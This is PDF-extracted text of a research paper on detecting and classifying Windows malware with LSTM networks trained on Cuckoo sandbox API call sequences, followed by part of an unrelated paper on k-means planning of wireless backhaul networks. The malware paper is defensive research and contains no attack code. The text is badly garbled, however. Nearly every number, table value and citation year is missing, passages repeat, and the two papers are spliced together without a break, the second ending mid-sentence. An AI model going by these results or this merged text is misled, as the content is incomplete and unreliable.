relationship, especially in order of time (hochreiter & schmidhuber, ). for example, if the time series data are x={x ,...,xt}, h={h ,...,ht} is the hidden vector sequence and y={y ,...,yt} shows an output vector sequence, then t iteration is defined as follows: ht =h(wxhxt +whhht− +bh) ( ) yt =f(whyht +by) where wxh, whh, and why are the computation time connection weight matrices and f is the activation function. system architecture this research has two main objectives; first, we created a relevant dataset, and then, using this dataset, we did a comparative study using various machine learning to detect and classify malware automatically based on their types. dataset creation one of the most important contributions of this work is the new windows pe malware api sequence dataset, which contains malware analysis information. are malware from different classes in this dataset. the cuckoo sandbox application, as explained above, is used to obtain the windows api call sequences of malicious software, and virustotal service is used to detect the classes of malware. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure general system architecture. architecture consists of parts; data collection, data pre- processing, and data classification. full-size doi: . /peerjcs. /fig- figure illustrates the system architecture used to collect the data and to classify them using lstm algorithms. our system consists of three main parts, data collection, data pre-processing and analyses, and data classification. the following steps were followed when creating the dataset. cuckoo sandbox application is installed on a computer running ubuntu linux distribution. the analysis machine was run as a virtual server to run and analyze malware. the windows operating system is installed on this server. the firewall has been turned off, and no operating system updates have been made to prevent any malware from running. the tools versions are; ubuntu . , cuckoo . . , windows analysis os, virtualbox . . , python . . . once the data are collected, we start the process to analyses and pre-process the malware using cuckoo as a dynamic more than , malware have been run separately in the cuckoo sandbox application, and the results are all stored in a mongodb database. from this analysis information, we obtained the behavioral data of the malware on the analysis machine. this behavior is all windows api call requests that the malware has made on the windows operating system. some of the data pre-processing activities are: • indexing windows api calls: when we examined the windows api calls in the dataset, we found that there were different api calls. these api calls are indexed from to . as a result, each row in the dataset represents the api call sequence for alware analysis. • dataset filtering: since these malware are developed for a specific application with a target, we filtered the api call sequence and discarded the rows that did not contain at least different api calls from the dataset. • analysis of malware using virustotal public api: we determined the hash values of each of malware that we analyzed and inquired these hash values with virustotal service. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. , adware backdoor downloader dropper spyware trojan virus worms malware class distribution figure the number of malware in each class. full-size doi: . /peerjcs. /fig- we stored the analysis results from the virustotal service into a database. thus, each malware was analyzed by many different antivirus engines, and the results of the analysis were recorded. • processing of analysis results: based on the results of each analysis, we have obtained using this service, we have labeled all the malware. during this process, we found out that different antivirus applications give different results for the same malware, or sometimes not every antivirus application can detect every malware. for example, when we analyze the hash value of e cf c c a a af fce in the virustotal service, many of the software indicate that this file is a worm, while drweb says it is a trojan, and babable end that it is a clean file. therefore, in determining the classes of malware, we considered the majority class in the analyzes. if the majority of engines agree that a particular sample is malicious, then it is as positive. • creating the dataset: finally, the labeled training dataset was created by matching the windows api call sequences and the malware classes. this dataset contains different classes of malware. our dataset is publicly available on github website (https://github.com/ocatak/malware_api_class). the number of malware included in these classes is shown in fig. . in this study, the malware classification method was developed by using the lstm algorithm. the lstm algorithm does not require any vectorization model, such as tf-idf, because it works with sequential data. however, it is necessary to compare the classification performance of the developed method with other traditional machine learning algorithms such as support vector machine, decision tree, k-nearest neighbor. tf-idf model traditional classification algorithms in ‘tf-idf’, we describe how to transform the text with the tf-idf method. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/ocatak/malware_api_class http://dx.doi.org/ . /peerj-cs. tf-idf term frequency-inverse document frequency based text dataset vectorization is a traditional method to create a numerical dataset. each term t in a document d is assigned a weight assignment according to the frequency of occurrence in that document (manning, raghavan & schütze, ). this process is called term frequency, tf(t,d). the vector, thus formed, can be considered as a digitized summary of a document. let the term t be represented by f (t,d) of the raw frequency. term frequency can be found as follow: tf(t,d)= f (t,d) ( ) however, a dataset generated only by the term frequencies assigns equal importance to each term. the of occurrence of any in a collection the inverse document frequency (idf) is defined as the logarithm of the division of the number of documents in the, n , to the document frequency, dft . idft = log n dft ( ) thus, if the dft in the documents in the collection is low, the idft value will be high, and in the high dtf frequency the idft value will be low. to calculate the weights of the terms contained in each document, the term frequency, tft,d, and inverse document frequency, idft , are combined to form the term frequency-inverse document frequency (tf-idf) matrix. tf −idft = tft,d×idft ( ) in this study, the malware classification method was developed by using the lstm algorithm. the lstm algorithm does not require any vectorization model, such as tf-idf, because it works with sequential data. however, it is necessary to compare the classification performance of the developed method with other traditional machine learning algorithms such as support vector machine, decision tree, k-nearest neighbor. the tf-idf model is used only because classification algorithms work with numerical data only. tf-idf is not used in our odel. classifier learning the steps – are run separately for each type of malware, creating classification models for different types. the experiments are done using the python programming language and machine learning libraries keras, tensorflow, and scikit-learn. we used the keras library to build lstm networks. we have created a two-tier lstm structure. in algorithm , we explain the general steps of our classifier building stage. accordingly, our algorithm’s both time and space complexity is o(n). in the algorithm, there is the main loop to build a representative classifier for each distinct label. figure shows the flowchart of the overall method. the process of malware classification includes the following steps in the proposed solution: . we select the that we want to classify. . we process the dataset for the selected malware type. the model assigns label to the malware type information of interest and label to other categories. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm classifier learning steps : inputs: malware api call dataset x, malware class labels y , class set c : for each c ∈c do : yc ← { , if y =c , otherwise flabels that are belongs to c will be , rest are for binary classifier : xtrainc ,xtestc ,ytrainc ,ytrainc ← train_test_split(x,yc , . ) f . training data, . validation data : hc ←lstm_model_fit(xtrainc ,ytrainc ) flstm model building with train dataset : end for : outputs: a set of classifiers set for each class c, h :x →y . a two-tier lstm-based classification model is defined and created. . the classifier is trained using % of the data during the training phase. validation is performed during training with % of the data allocated for training. . the trained classifier is tested using % of the data in the dataset. during this process, api calls of a new software are shown to the classifier and a class label is assigned to these new instances based on the voting results of the models. . training and test results are recorded. . the classifier is trained using % of the data during the training phase. validation is performed during training with % of the data allocated for training. the training process is shown in fig. . the lstm network model receives the api calls that each malware makes on the windows operating system and assigns the class label to ŷ. as we apply the classifiers to each of the malware classes, our classifier is binary ones. log loss function is used as the loss function, shown in eq. ( ). l(y,ŷ)= l l=|l|∑ l= − ( yl log(ŷl)+( −yl)log( − ŷl) ) ( ) evaluation since the dataset that is used in our experiments highly imbalanced, traditional accuracy based performance evaluation is not enough to find out an optimal classifier. we used four different metrics, the overall prediction accuracy, average recall, average precision (turpin & scholer, ) and f score, to evaluate the classification accuracy, which measurement metrics in information retrieval (manning, raghavan & schütze, ; makhoul et al., ). experiments and results in this study, we performed the classification of malware belonging to different families in the dataset described in section . with the lstm algorithm. all experiments were run in a python environment, and all algorithm codes have been modified to build a catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. start split dataset into train ( % xtrain) and test ( % xtest) foreach class c ∈ c change corresponding label yc ← { , if y = c , otherwise train test split for the dataset with new label xtrain, xtest, ytrain, ytrain ← train test split(x, yc, . ) build classifier hc for class c and evaluate the h using xtest, ytest set of classifiers:h overall test of h model building exit classifier building loop validation data model building loop figure flflow chart of the overall system. full-size doi: . /peerjcs. /fig- classification model from the given data. our codes can be accessed on our github repository (https://github.com/ocatak/malware_api_class/tree/master/src). as we have explained in the previous sections, we can analyze the sequential data with the lstm algorithm that we have used within the scope of this study and create a classification model as a result. when it is desired to a model using other classification algorithms, the existing text data should be digitized. for this purpose, we used the tf-idf method, which is the most common text digitization method. we used our numerical data set with this method with the k-nearest neighborhood, decision tree (dt), and support vector machine (svm) algorithms. in ‘tf-idf’, we describe how to transform the text with the tf-idf method. in this section, we will share the experimental results for binary and multi-class classification separately. we designed different experiments for multi-class classification; catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/ocatak/malware_api_class/tree/master/src http://dx.doi.org/ . /peerj-cs. lstm - lstm - <start> lzcopy createprocess getpriorityclass encryptfile openprocess malicious/benign lstm based classification model figure lstm classification model with windows api calls. full-size doi: . /peerjcs. /fig- single layer lstm and two layers lstm. the purpose of doing this is that two-layer lstm models are overfitting in some cases. model configuration since we wanted to create a model for each class, we edited the class information in the dataset. we assigned for the malware class to be analyzed and for the others. since we do this while creating each classification model, these models perform binary type classification. for example, the result of the classification model created for the adware class is adware or other. we used tanh, relu, sigmoid, softplus, softsign, softmax and linear activation functions and created eight different models for each malware class. we have used the same flow layers, although there are different numbers of data analyzed at the stage of creating malware models. an example of the flow layers of the models is the adware classification model, which is shown in fig. . binary classification results table shows the classification performance of lstm and conventional algorithms results. although the accuracy rates of the traditional methods and the deep learning methods seem to be similar, f values give more meaningful information due to the lack of close class distributions. f represents the balance between precision and recall values. therefore, the f values obtained by the deep learning method better than the f values obtained by the traditional methods. this suggests that deep learning is better for analyzing malware behavior. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. embedding_ : embedding input: output: (none, ) (none, , ) lstm_ : lstm input: output: (none, , ) (none, , ) dropout_ : dropout input: output: (none, , ) (none, , ) lstm_ : lstm input: output: (none, , ) (none, , ) flatten_ : flatten input: output: (none, , ) (none, ) dense_ : dense input: output: (none, ) (none, ) figure the classification model layers and their neurons. full-size doi: . /peerjcs. /fig- as expected, based on the experimental results, the classification performance of the models created by using traditional classification algorithms using the tf-idf based vectorization method, where the sequence information is not used, is lower than the performance of the model created using the lstm algorithm. considering all four classification evaluation metrics, we proposed a practical implementation of the malware detection model using the lstm algorithm. our proposed method is more efficient as we obtained better scores on all the evaluation metrics. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table lstm and conventional algorithms classification results. adware backdoor downloader dropper spyware trojan virus worm lstm accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . func. tanh tanh soft sign soft sign soft sign soft sign tanh soft sign k-nn accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . dt accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . rbf svm accuracy . . . . . . . . precision . . . . . . . . recall . . . . . . . . f . . . . . . . . sigmoid svm accuracy . . . . . . . . precision . recall . f . notes. bold values indicate the best value of each column. based on the results and the classification performance shown in table , we conclude that the lstm model is the best approach that provides the best performance for all evaluation metrics. multi-class classification results using our data set, we created several multi-class classification models with different classes are also created. especially by using different hyper-parameters, the most successful models were tried to be obtained. f metric value will be used to compare the analysis results. the classification_report method in the sklearn.metrics the end library was used to calculate the f , precision, recall, and average values of these values. the average f catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. embedding_ : embedding input: output: (none, ) (none, , ) lstm_ : lstm input: output: (none, , ) (none, ) dense_ : dense input: output: (none, ) (none, ) figure single layer lstm classification model structure. full-size doi: . /peerjcs. /fig- value produced by this method takes into account the precision and recall values and class weights in the dataset. single layer lstm results single-layer lstm models have been created that can classify different types of malware. these models produce an output between – . these values represent malware class. figure shows our single layer lstm architecture. while creating the models, it is aimed to obtain the best classification model by using many different hyper-parameters. table shows our hyper-parameter search space. table shows the best classification performance obtained using following hyper- parameters. the training history, accuracy and loss graphs of the model created by using the best hyper-parameters are given in figs. a and b respectively. when the graphics are examined, it is seen that the model education process stops at the th epoch. the reason for this situation is that the model comes to the overfitting point. during the model trainings, using the earlystopping parameter, it was ensured that the education was terminated without reaching the extreme fit of the model. the confusion matrix information obtained as a result of testing the trained classification model is given in table . the analysis results obtained by testing the trained classification model are shown in table . two layers lstm results two-layer lstm models have been created that can classify different types of malware. these models produce an output between – . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table hyper-parameter search space to tune the model. hyper-parameter search space embedding layer number of units - lstm layer number of units - activation function: anh activation function tanh , relu, sigmoid, softplus, softsign, softmax, linear kernel initializer: kernel initializer random_uniform, glorot_uniform, lecun_uniform, uniform dropout: dropout . - . optimizer: optimizer adam, adadelta, adamax, nadam table best hyper-parameters. hyper-parameter value embedding units units: units activation sigmoid kernel_initializer glorot_uniform dropout . optimizer adam epoch . . . . . . . ac cu ra cy training validation (a) accurancy (b) loss epoch . . . . . . . lo ss training validation figure single layer lstm model accuracy-loss graphics. (a) accuracy; (b) loss. full-size doi: . /peerjcs. /fig- table shows the best classification performance hyper-parameters. according to fig. , the model training process stops at the th epoch because of overfitting limit. during the model trainings, the training was ended before the model reached the extreme fit state by using the earlystopping parameter. confusion matrix is given in table . table shows the two layers lstm model classification performance results. multi-class classification model results obtained using different algorithms are given in table . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table single layer lstm model confusion matrix. table single layer lstm model classification results. precision recall f adware . . . backdoor . . . downloader . . . dropper . . . spyware . . . trojan . . . virus . . . worm . . . average . . . table hyper-parameter search space to tune the model. hyper-parameter search space embedding units units: units lstm- activation : softsign softsign lstm- kernel_initializer glorot_uniform lstm- activation : softsign softsign lstm- kernel_initializer glorot_uniform lstm- recurrent_dropout . dense kernel_regularizer regularizers.l ( . ) dense activity_regularizer regularizers.l ( . ) optimizer: adam optimizer adam results as expected, based on the experimental results, lstm based malware classification than the tf-idf based conventional machine learning algorithms’ classification performance. considering all the four classification evaluation metrics, we proposed a practical implementation of the malware classification model using sequential based windows os api calls and lstm networks. our proposed method is more efficient as we get better scores on evaluation metrics. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. epoch . . . . . . ac cu ra cy (a) accuracy (b) loss epoch . . . . . lo ss training validation training validation figure two layers lstm model accuracy-loss graphics. (a) accuracy; (b) loss. full-size doi: . /peerjcs. /fig- table two layers lstm model confusion matrix. table . hyper-parameter search space to tune the model. hyper-parameter search space embedding units units lstm- activation softsign lstm- kernel initializer glorot uniform lstm- activation softsign lstm- kernel initializer glorot uniform lstm- recurrent dropout . dense kernel regularizer regularizers.l ( . ) dense activity regularizer regularizers.l ( . ) optimizer adam epoch . . . . . . a c c u ra c y (a) accuracy (b) loss epoch . . . . . lo s s training validation training validation figure . two layers lstm model accuracy-loss graphics table . two layers lstm model confusion matrix predicted label tr ue la be l table shows the two layers lstm model classification performance results. multi-class classification model results obtained using different algorithms are given in table . . results as expected, based on the experimental results, lstm based malware classification model’s performance is better than the tf-idf based conventional machine learning algorithms’ classification performance. considering all the four classification evaluation metrics, we proposed a practical implementation of the / peerj comput. sci. reviewing pdf | (cs- : : : : :check jun ) manuscript to be reviewedcomputer science based on the results presented in section . and section . the computation results shown in table , it can be concluded that lstm is the best approach that provides best results for all evaluation metrics. on the other hand, if we compare the training periods, the training of lstm models takes longer. the features of the computer where the experiments are carried out are as follows; windows ( bit), intel(r) core(tm) i - cpu@ . ghz, and gb ram. the training durations are • single layer lstm: . min • two lyers lstm: . min • decision tree: . min • knn: . min catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table two layers lstm model classification performance results. precision recall f adware . . . backdoor . . . downloader . . . dropper . . . spyware . . . trojan . . . virus . . . worm . . . average . . . table multi-class classificaton model performance results. precision recall f lstm . . . lstm . . . dt . . . knn . . . rf . . . svm . . . • rf: . min • svm: . min sequential data are used for lstm while making the vectorizing process using the tf-idf model with conventional methods. according to confusion matrices on tables – , we can conclude that the most discriminating malware class is trojan and the least discriminating class is spyware. from these results, we can conclude that the samples belonging to the spyware malware class do not follow a particular api call sequence. although the model complexity was increased with layers of lstm, and we did not see a significant difference when we examined the classification performances. conclusion and future works the purpose of this study was to create a dataset by obtaining runtime system calls made by malicious software on windows . as a result, we built a dataset that contains the malware behavioral data at runtime and class labels to which the software was included. classification model is proposed, and this dataset created a model for malware detection using deep learning method lstm. we build separate classification models for each malware family and found that the results of the classification of these models showed a success rate between . % to . %. we can say that our classification method exhibits excellent performance because catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. virustotal services malware family labeling cannot be accurate. also we showed that single- layer lstm and two-tier lstm models achieved almost the same classification results. thus, the complexity of the model doesn’t increase performance. although our dataset contains instances that belong to some malware families with unbalanced distribution, we have shown that this problem does not affect classification performance. our research can be applied to other malware families as well because the behavior demonstrated by metamorphic malware in an operating system is similar do the other family members. as a result, the lstm approach can be used in the classification of metamorphic malware, and this study is a conceptual proof of this finding. it is assumed that the malware did not detect the sandbox environment in the dataset we used in this analysis. some sophisticated malware the potential to identify that they are being run in an isolated environment by using the images methods have started to be introduced instead of running such malware in a sandbox environment to detect such malware that changes behavior by detecting an anti-vm environment. as future work, we intend to use malware images method to classify the correctly labeled dataset. besides, we want to use other sequential data classification algorithms used before deep learning. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • ferhat ozgur catak and ahmet faruk yazı conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • ogerta elezaj and javed ahmed analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the mal-api- dataset is available at github: https://github.com/ocatak/malware_api_class python source folder is also available at github: https://github.com/ocatak/malware_ api_class/tree/master/src. references ahmed me, nepal s, kim h. . ‘‘medusa: malware detection using statistical analysis of system’s behavior’’. in: ieee th international conference on collaboration and internet computing (cic). piscataway: ieee. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class/tree/master/src https://github.com/ocatak/malware_api_class/tree/master/src http://dx.doi.org/ . /peerj-cs. alazab m, layton r, venkataraman s, watters p. . malware detection based on structural and behavioural features of api calls. in: st international cyber resilience conference. alazab m, venkataraman s, watters p. . towards understanding malware be- haviour by the extraction of api calls. in: second cybercrime and trustworthy computing workshop. – doi . /ctc. . . ali m, shiaeles s, clarke n, kontogeorgis d. . a proactive malicious software identification approach for digital forensic examiners. journal of information security and applications : – doi . /j.jisa. . . . Çatak fÖ, yazi af. . a benchmark api call dataset for windows pe malware classification. corr. arxiv preprint. arxiv: . . cheng jy, tsai t, yang c. . ’’an information retrieval approach for malware classification based on windows api calls’’. in: international conference on machine learning and cybernetics. hampton n, baig z, zeadally s. . ransomware behavioural analysis on win- dows platforms. journal of information security and applications : – doi . /j.jisa. . . . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – . kolosnjaji b, zarras a, webster g, eckert c. . deep learning for classification of malware system call sequences. cham: springer international publishing, – . leder f, steinbock b, martini p. . ‘‘classification and detection of metamorphic malware using value set analysis’’. in: international conference on malicious and unwanted software (malware). makhoul j, kubala f, schwartz r, weischedel r. . performance measures for information extraction. in: proceedings of darpa broadcast news workshop. – . manning cd, raghavan p, schütze h. . introduction to information retrieval. new york: cambridge university press. martín i, hernández ja, de los santos s. . machine-learning based analysis and classification of android malware signatures. future generation computer systems : – doi . /j.future. . . . mehra v, jain v, uppal d. . ‘‘dacomm: detection and classification of metamor- phic malware’’. in: fifth international conference on communication systems and network technologies. muzaffar s, afshari a. . short-term load forecasts using lstm networks. energy procedia : – innovative solutions for energy transitions doi . /j.egypro. . . . noor m, abbas h, shahid wb. . countering cyber threats for industrial applica- tions: an automated approach for malware evasion detection and analysis. journal of network and computer applications : – doi . /j.jnca. . . . peiravian n, zhu x. . machine learning for android malware detection using permission and api calls. in: ieee th international conference on tools with artificial intelligence. piscataway: ieee, – doi . /ictai. . . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ctc. . http://dx.doi.org/ . /j.jisa. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /j.egypro. . . http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /ictai. . http://dx.doi.org/ . /peerj-cs. pirscoveanu rs, hansen ss, larsen tmt, stevanovic m, pedersen jm, czech a. . ‘‘analysis of malware behavior: type classification using machine learning’’. in: international conference on cyber situational awareness, data analytics and assessment (cybersa). qiao y, yang y, ji l, he j. . ’’analyzing malware by abstracting the frequent itemsets in api call sequences’’. in: ieee international conference on trust, security and privacy in computing and communications. piscataway: ieee. rad bb, masrom m, ibrahim s. . camouflage in malware: from encryption to metamorphism. international journal of computer science and network security ( ): – . sami a, yadegari b, rahimi h, peiravian n, hashemi s, hamzeh a. . malware detection based on mining api calls. in: sac ’ . usa: mit press. shamshirband s, chronopoulos at. . a new malware detection system using a high performance-elm method. in: ideas . proceedings of the rd international database applications & engineering symposium. new york: association for comput- ing machinery. shamshirband s, rabczuk t, chau k. . a survey of deep learning techniques: application in wind and solar energy resources. ieee access : – . shiel i, o’shaughnessy s. . improving file-level fuzzy hashes for malware variant classification. digital investigation :s –s doi . /j.diin. . . . tian r, islam r, batten l, versteeg s. . differentiating malware from cleanware using behavioural analysis. in: th international conference on malicious and unwanted software. – doi . /malware. . . turpin a, scholer f. . user performance versus precision measures for simple search tasks. in: sigir ’ . proceedings of the th annual international acm sigir conference on research and development in information retrieval. new york: acm, – . vinod p, jain h, golecha yk, gaur ms, laxmi v. . ’’medusa: metamorphic malware dynamic analysis using signature from api’’. in: proceedings of the rd international conference on security of information and networks. yazi af, Çatak f, gül e. . classification of methamorphic malware with deep learning(lstm). in: th signal processing and communications applications conference (siu). – doi . /siu. . . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.diin. . . http://dx.doi.org/ . /malware. . http://dx.doi.org/ . /siu. . http://dx.doi.org/ . /peerj-cs. paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , application of wireless return topology planning based on k-means yang weixia xi'an technological university school of computer science and engineering shaanxi , xi'an, china e-mail: @qq.com xu fei xi'an technological university school of computer science and engineering shaanxi , xi'an, e-mail:china @qq.com li he xi'an technological university school of computer science and engineering shaanxi , xi'an, china e-mail: @qq.com chen yuan xi'an technological university school of computer science and engineering shaanxi , xi'an, china e-mail: @qq.com abstract—with the development of communication technology and the general trend of interconnection and intercommunication, people's demand for high-quality information and communication is increasing day by day. therefore, the intensive deployment of base stations has become the development trend of the construction of a new generation of communication network. in this paper, in order to solve the urban and rural electric scenarios such as traditional transport unreachable problem, on the basis of the operator site cost at the same time, keep the quality of signal transmission, give full play to the advantages of the traditional planning concept and artificial intelligence algorithm, integrated "pieces", "step by step optimization", "local optimal", "the results of reverse", such as ideas, set up a wireless back mathematical analysis model of network topology programming problem. the purpose of this paper is to reduce the cost and reduce the return path loss. aiming at the lower cost problem, a local optimal model is constructed. first division, through the k - means algorithm is divided into k, for each region is also based on k - means algorithm is further split into its n tribal groups, limited each tribal group one and only one host station, recently to tribal group of perimeter centroid position of butterfly stand stand as a host, the rest of the site as a child, according to the type of tribal group of judge whether the number of sub station meet the qualification, if not satisfied, change the k value and the adjustable radius, respectively, until meet the qualification, the best solution is calculated. for the lower return path loss problem, if only the loss problem is considered, the loss result is obtained by changing the distance between the first jump and the second jump based on the model. through the comparison of the results, the best scheme is obtained when only loss is considered. keywords-wireless return; base station deployment; k- means algorithm; piecemeal optimization i. the problem background with the rapid development of mobile communication network, various mobile terminal devices and applications affect every aspect of people's life. however, the current network information construction faces some problems: the acceleration of urban construction makes the urban environment more and more complex, which leads to the formation of many wireless signal black spots and weak coverage areas in densely populated urban areas; some urban residents misunderstand the construction of base stations, believing that the harm of base stations into the community is serious, which makes the deployment of base stations significantly more difficult, and the phenomenon of station demolition is also increasing. due to the difficulties in property coordination in many communities, the arrival rate of the last kilometer of transmission fiber deployment is low. in literature [ ], the deployment principles, coverage characteristics, station type selection and comparison with conventional micro-base stations are studied, and the actual deployment scheme of relay micro-base station is proposed, and the effectiveness of the scheme is verified. literature [ ] focuses on analyzing the principle and characteristics of relay technology, and deeply studies the deep coverage of urban areas and the wide coverage of rural areas and roads. literature [ ] studies the impact of relay technology on the wireless network structure, wireless network planning and the development of wireless network planning tools. literature [ ] discussed whether the broadband wireless communication system doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , can be deployed under the condition of non-line-of- sight nlos. can you provide reliable high bandwidth connections? is there a reliable high bandwidth nlos solution available? the above literature mainly starts from the theory, while this paper mainly studies the base station deployment plan from the actual situation, establishes the model and conducts the feasibility verification, and finally achieves the goal of low cost and small path loss to improve the user experience. ii. mathematical model a. the known conditions the location distribution of candidate sites in this paper is known, and there are sites. only the mutual location and topological relationship between sites are considered, that is, only the distance between the host station and the sub-station is considered. the integrated cost of various station types, including the integrated cost of the host station, the integrated cost of the sub-station, and the cost of satellite equipment are also known. total cost = host station cost * number of host stations + substation cost * number of substations + satellite cost * number of satellites average cost = total cost/number of sites in the region the topological relationship between sites meets the following conditions: ) the distance between the host station and the first-level sub-station is no more than km, and the distance between sub-stations is no more than km. ) the site is divided into two types: rurastar (one sector) and butterfly station (two sectors). ) if it is the host station, the maximum number of sub-stations at level in each sector is , and the total number of sub-stations does not exceed . ) regardless of the coverage direction of butterfly station sector; ) the limit of microwave communication distance between host stations is km. ) wireless return connection is adopted between host station and sub-station and between sub-stations; ) each sub-station can only have two wireless back links at most, that is, the upstream and downstream links are unique; ) the relation diagram between host station and substation is similar to the tree diagram. ) there is only one path between any substation and the host station, and the number of hops is less than . ) there is a one-to-many relationship between the satellite and the host station. a host station group with less than satellites can share a satellite. the wireless back propagation is affected by the nlos scene, and the free space propagation is adopted to simplify the calculation. the model estimates the path loss between sites, and the formula is as follows: pl= . + *lg(d)+ *lg(f) where, pl stands for path loss, d is the distance between the two stations, the unit is km, f is the transmission frequency, the default is a constant, mhz. average system loss = sum of all wireless return connection losses/number of wireless return connections level substation after the firs t hop distance is less than or equal to km, the hop distance is les s than or equal to km, and the hop count is less than or equal to . level substation th e maximum number of s ub-station acces ses per sector of the host station is , and the maximum number of sub- stations is th ere is only one path between the substation and the host station. host station level substation maximum communication distance between host stations is km figure . schematic diagram of connections between sites b. question assumptions ) suppose rrn(erelay remote node) wireless transmission device as a substation; ) it is assumed that denb, as the host station, can be divided into to host cells, covering different directions. ) it is assumed that the effects of terrain blocking and ordinary mobile phone access blocking on the back transmission quality are not considered. ) it was assumed that rebts interference was not considered. international journal of advanced network, monitoring and controls volume , no. , ) the interference of adjacent base stations is not considered. ) it is assumed that the first jump of cascade between base stations is not greater than km, and then it is not greater than km. ) assuming that the sector coverage direction of butterfly station is not taken into account, the maximum number of sub-stations is . ) it is assumed that the maximum number of ruralstar stations is . ) it is assumed that the host stations are connected by microwave and the maximum communication distance is km. ) suppose that the host station and the sub-station and the sub-station are connected by wireless back transmission. ) it is assumed that a substation can only have one host station, and there is only one path to the host station, and the path contains no more than hops. ) it is assumed that there can be no more than wireless return connections between each substation. ) assuming that only one satellite of any host station is responsible for the back transmission, host stations connected by slices can share one satellite, and each satellite can only bear the back transmission data of host stations. ) it is assumed that the total number of host stations is unlimited. ) assuming that the maintenance costs of the host station, substation and satellite are not taken into account. ) assuming that other factors are not considered, the spherical model is transformed into a plane model. ) it is assumed that the path consumption is estimated by the free space model without considering the influence of nlos. c. meaning of the symbols table i. notation table symbols meaning los line-of-sight transmission capability roi return on investment nlos non-line-of-sight transmission capability rrn the infinite return device of the infinite return scheme rn relay station ue ordinary mobile phone pl path to the consumption apl average path consumption d site spacing f transmission frequency r radius of the earth s the distance between the spheres ɑi i point longitude β i i point the dimension i base station identification xi the host site yi the child site zi satellite point c the overall cost fd the first jump distance nd after each jump distance fxi butterfly host station rxi star host station wl microwave connections between host stations wbl wireless return connection between host station and sub-station and between sub- stations js the number of hops from a substation to a host station ceil the function that rounds up d. the establishment and solution of the model ) analysis of problems in combination with table , the cost of satellite > host station costs > sub station costs, to achieve the overall cost of wireless return part of the station is lower, the first need to ensure the minimum number of satellites, that is, as far as possible host stations share a satellite; secondly, the number of host stations should be kept as small as possible. since butterfly station has one more sector than rurastar, the maximum access number of sub-stations is , covering a wider range, so butterfly station should be selected as the host station as far as possible. in real life, the deployment of the site is usually partitions, according to the "division", "local optimum, and the thought of" step by step optimization ", first by using k means clustering algorithm, all the site is divided into k classes, each international journal of advanced network, monitoring and controls volume , no. , kind of belonging to a satellite, then each category divided into n host station tribal groups, the mathematical model established between k, n, and cost, butterfly site closest to the center of mass as a host station, and then judge the location of the relationship between sub station with the host station whether meet the constraints of distance, the host station to station traverse connection relations, select the connection path with the most extensive coverage, and get the scheme with lower cost.if a plane carrying a large number of passengers is replaced by a small passenger plane some passengers will overflow, and some passengers will not be able to register because of the number of passengers. for path loss, only consider the child stand back part of the path loss, and not to consider path loss between host station, just meet the distance limit, so can be achieved by increasing the number of the host station to smaller path loss, when the host stand for most time, path loss minimum, but also will increase the cost of satellite transmission. if the effective distance of wireless return transmission is limited, that is, the distance between the substation and the host station and between the substations is limited, then in theory, a low path loss can be obtained. by means of the idea of "result inverse", the model is modified, and then the modified station model is deduced, and the lowest cost scheme, namely the optimal solution of the problem, is finally screened out. ) problem model establishment a) establishment of objective function total cost: number of host stations * host station cost + number of substations * substation cost + number of satellites * satellite cost. the number of satellites is equal to ceil (number of host stations / ), and ceil () indicates the upward direction.  m  zyxinc   where: c represents the total cost under the topology; x represents the number of host stations; y represents the number of sub-stations; z is the number of satellites. table ii. shows the costs of various modes of transmission in wusd transport cost host station child station satellite b) establishment of constraint conditions:  the distance of the first hop is km, and that of each subsequent hop is km.  site includes ruralstar and butterfly station two different station type; among them, ruralstar contains sector in total, and butterfly station contains sectors in total. if the site is the host station, the maximum number of sub-stations at the first level of each sector is , and the maximum total number of sub-stations is . in order to 